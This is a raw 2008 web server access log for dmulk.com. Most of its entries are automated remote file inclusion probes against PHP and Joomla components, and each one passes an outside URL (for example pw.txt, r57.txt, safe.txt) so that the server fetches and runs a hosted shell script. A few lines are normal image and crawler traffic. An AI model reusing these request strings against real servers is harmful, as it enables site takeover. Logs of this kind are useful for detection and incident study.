80.199.179.9 - - [28/Aug/2008:12:08:01 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
78.129.230.66 - - [28/Aug/2008:12:08:01 -0700] "GET /components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php?file=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
78.129.230.66 - - [28/Aug/2008:12:08:01 -0700] "GET /logs/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php?file=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
80.199.179.9 - - [28/Aug/2008:12:08:01 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.111.179.12 - - [28/Aug/2008:12:08:02 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.111.179.12 - - [28/Aug/2008:12:08:03 -0700] "GET //index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 200 85263 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:12:08:09 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0148.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
69.93.189.2 - - [28/Aug/2008:12:08:11 -0700] "GET /components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php?file=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/up.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.93.189.2 - - [28/Aug/2008:12:08:11 -0700] "GET /logs/access_080409.log/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php?file=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/up.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.93.189.2 - - [28/Aug/2008:12:08:11 -0700] "GET /logs/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php?file=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/up.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.205.57.211 - - [28/Aug/2008:12:08:25 -0700] "GET /components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php?file=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
74.205.57.211 - - [28/Aug/2008:12:08:25 -0700] "GET /logs/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php?file=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
67.192.48.154 - - [28/Aug/2008:12:08:26 -0700] "GET /logs/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php?file=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
67.192.48.154 - - [28/Aug/2008:12:08:26 -0700] "GET /components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php?file=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
89.111.179.12 - - [28/Aug/2008:12:08:35 -0700] "GET /logs/access_080815.log//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.230.81.72 - - [28/Aug/2008:12:08:46 -0700] "GET /logs/access_080209.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://h1.ripway.com/untouchme/bot/safe.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.81.72 - - [28/Aug/2008:12:08:47 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://h1.ripway.com/untouchme/bot/safe.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.81.72 - - [28/Aug/2008:12:08:52 -0700] "GET /logs/access_080128.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://h1.ripway.com/untouchme/bot/safe.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.18.216 - - [28/Aug/2008:12:08:54 -0700] "GET /bikes/dteel/2008-05-30/?N=D HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.52.166.232 - - [28/Aug/2008:12:08:58 -0700] "GET /components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php?file=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/up.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.52.166.232 - - [28/Aug/2008:12:08:58 -0700] "GET /logs/access_080409.log/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php?file=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/up.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.52.166.232 - - [28/Aug/2008:12:08:58 -0700] "GET /logs/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php?file=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/up.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.240 - - [28/Aug/2008:12:09:07 -0700] "GET /logs/access_080709.log//tools/send_reminders.php?noSet=0&includedir=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [28/Aug/2008:12:09:07 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [28/Aug/2008:12:09:07 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [28/Aug/2008:12:09:07 -0700] "GET /logs/access_080711.log//tools/send_reminders.php?noSet=0&includedir=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.231.189.121 - - [28/Aug/2008:12:09:26 -0700] "GET /blog/index.php/category/uncategorized/ HTTP/1.0" 200 9937 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)" "dmulk.com"
70.168.150.67 - - [28/Aug/2008:12:09:39 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0132.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
72.29.70.187 - - [28/Aug/2008:12:09:45 -0700] "GET /logs/access_080518.log/include/bbs.lib.inc.php?site_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/format.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.29.70.187 - - [28/Aug/2008:12:09:45 -0700] "GET /include/bbs.lib.inc.php?site_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/format.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.29.70.187 - - [28/Aug/2008:12:09:45 -0700] "GET /logs/include/bbs.lib.inc.php?site_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/format.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
80.199.179.9 - - [28/Aug/2008:12:09:48 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.199.179.9 - - [28/Aug/2008:12:09:49 -0700] "GET //Neos_Chronos/header.php?base_folder=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.199.179.9 - - [28/Aug/2008:12:09:51 -0700] "GET /logs/access_080102.log//Neos_Chronos/header.php?base_folder=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.29.70.187 - - [28/Aug/2008:12:09:59 -0700] "GET /logs/access_080630.log/include/bbs.lib.inc.php?site_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/format.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:12:10:01 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0161.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
66.221.68.20 - - [28/Aug/2008:12:10:47 -0700] "GET /logs/access_080127.log/modules/public/calendar.php?baseDir=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.68.20 - - [28/Aug/2008:12:10:47 -0700] "GET /logs/modules/public/calendar.php?baseDir=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.68.20 - - [28/Aug/2008:12:10:50 -0700] "GET /modules/public/calendar.php?baseDir=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
80.199.179.9 - - [28/Aug/2008:12:11:19 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.179.9 - - [28/Aug/2008:12:11:20 -0700] "GET //Neos_Chronos/header.php?base_folder=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.179.9 - - [28/Aug/2008:12:11:20 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:12:11:30 -0700] "GET /logs/access_080121.log/errors.php?error=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:12:11:30 -0700] "GET /errors.php?error=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:12:11:33 -0700] "GET /logs/access_071222.log/errors.php?error=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:12:11:34 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0048.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
80.199.179.9 - - [28/Aug/2008:12:11:34 -0700] "GET //Neos_Chronos/header.php?base_folder=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:12:11:46 -0700] "GET /logs/access_080121.log/errors.php?error=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:12:11:46 -0700] "GET /errors.php?error=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:12:11:46 -0700] "GET /logs/errors.php?error=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:12:11:48 -0700] "GET /logs/access_071222.log/errors.php?error=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:12:11:51 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0074.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
216.246.8.237 - - [28/Aug/2008:12:11:52 -0700] "GET /logs/access_080229.log/multithumb.php?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:12:12:00 -0700] "GET /logs/access_080801.log//include/admin.lib.inc.php?site_path=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:12:12:00 -0700] "GET //include/admin.lib.inc.php?site_path=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.230.81.72 - - [28/Aug/2008:12:12:09 -0700] "GET /logs//administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://h1.ripway.com/untouchme/bot/safe.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.81.72 - - [28/Aug/2008:12:12:11 -0700] "GET //administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://h1.ripway.com/untouchme/bot/safe.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:12:12:18 -0700] "GET /logs/access_080718.log//include/admin.lib.inc.php?site_path=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
128.177.28.235 - - [28/Aug/2008:12:12:21 -0700] "GET /logs/access_080302.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:12:12:30 -0700] "GET /logs/access_080801.log//include/admin.lib.inc.php?site_path=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:12:12:30 -0700] "GET //include/admin.lib.inc.php?site_path=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:12:12:31 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:12:12:35 -0700] "GET /errors.php?error=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [28/Aug/2008:12:12:42 -0700] "GET /logs//sonda/booth.php?include_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [28/Aug/2008:12:12:43 -0700] "GET //sonda/booth.php?include_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:12:12:55 -0700] "GET /logs/access_080718.log//include/admin.lib.inc.php?site_path=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:12:12:57 -0700] "GET /logs/access_080810.log/errors.php?error=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:12:12:57 -0700] "GET /errors.php?error=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:12:13:09 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:12:13:10 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:12:13:14 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
74.55.109.34 - - [28/Aug/2008:12:13:21 -0700] "GET /logs/access_080810.log/errors.php?error=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:12:13:21 -0700] "GET /errors.php?error=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:12:13:21 -0700] "GET /logs/errors.php?error=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [28/Aug/2008:12:13:31 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [28/Aug/2008:12:13:31 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.26.234.69 - - [28/Aug/2008:12:13:33 -0700] "GET /modules/public/calendar.php?baseDir=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.26.234.69 - - [28/Aug/2008:12:13:34 -0700] "GET /logs/access_080127.log/modules/public/calendar.php?baseDir=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.26.234.69 - - [28/Aug/2008:12:13:34 -0700] "GET /logs/modules/public/calendar.php?baseDir=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:12:13:56 -0700] "GET /logs/access_080801.log//?custompluginfile[]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:12:13:58 -0700] "GET //?custompluginfile[]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 85091 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:12:13:58 -0700] "GET /logs/access_080801.log//?custompluginfile[]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:12:13:59 -0700] "GET /logs//?custompluginfile[]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 62576 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:12:13:59 -0700] "GET /logs/access_080703.log/errors.php?error=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:12:14:00 -0700] "GET //?custompluginfile[]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 85075 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:12:14:00 -0700] "GET /logs//?custompluginfile[]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 62576 "-" "libwww-perl/5.811" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:12:14:01 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.philippineslive.net/video/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:12:14:01 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.philippineslive.net/video/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:12:14:01 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.philippineslive.net/video/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:12:14:04 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.philippineslive.net/video/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.174.1.62 - - [28/Aug/2008:12:14:08 -0700] "GET /logs/access_080223.log//?mosConfig_absolute_path=http://www.surat1.go.th/nites/components/.psy/mig22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:12:14:23 -0700] "GET /logs/access_080106.log//claroline/phpbb/page_tail.php?includePath=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:12:14:37 -0700] "GET /logs/access_080106.log//claroline/tracking/userLog.php?rootSys=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:12:14:53 -0700] "GET /logs/access_080801.log//?custompluginfile[]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:12:14:54 -0700] "GET //?custompluginfile[]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 85091 "-" "libwww-perl/5.65" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:12:14:56 -0700] "GET /logs/access_080227.log//?path%5Bdocroot%5D=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:12:14:56 -0700] "GET /logs//?custompluginfile[]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 62576 "-" "libwww-perl/5.65" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:12:14:57 -0700] "GET //?path%5Bdocroot%5D=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 200 85167 "-" "libwww-perl/5.812" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:12:14:58 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 200 62576 "-" "libwww-perl/5.812" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:12:15:01 -0700] "GET /logs/access_080820.log//Neos_Chronos/header.php?base_folder=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:12:15:03 -0700] "GET //include/admin.lib.inc.php?site_path=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.174.1.62 - - [28/Aug/2008:12:15:09 -0700] "GET /logs/access_080518.log//?mosConfig_absolute_path=http://www.surat1.go.th/nites/components/.psy/mig22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:12:15:13 -0700] "GET /errors.php?error=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:12:15:13 -0700] "GET /logs/access_080227.log//?path%5Bdocroot%5D=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.199.179.9 - - [28/Aug/2008:12:15:13 -0700] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:12:15:13 -0700] "GET //?path%5Bdocroot%5D=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 85067 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:12:15:14 -0700] "GET /logs//?path%5Bdocroot%5D=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 62576 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:12:15:15 -0700] "GET /logs/access_080227.log//?path%5Bdocroot%5D=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:12:15:16 -0700] "GET //?path%5Bdocroot%5D=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 85067 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:12:15:16 -0700] "GET /logs//?path%5Bdocroot%5D=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 62576 "-" "libwww-perl/5.811" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:12:15:35 -0700] "GET /logs/access_080801.log//?custompluginfile[]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:12:15:36 -0700] "GET //?custompluginfile[]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 85059 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:12:15:43 -0700] "GET /logs//?custompluginfile[]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 62576 "-" "libwww-perl/5.65" "www.dmulk.com"
202.67.9.130 - - [28/Aug/2008:12:15:47 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://h1.ripway.com/untouchme/bot/safe.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.214.95.209 - - [28/Aug/2008:12:15:48 -0700] "GET /logs/access_080809.log/errors.php?error=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [28/Aug/2008:12:15:48 -0700] "GET /errors.php?error=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.8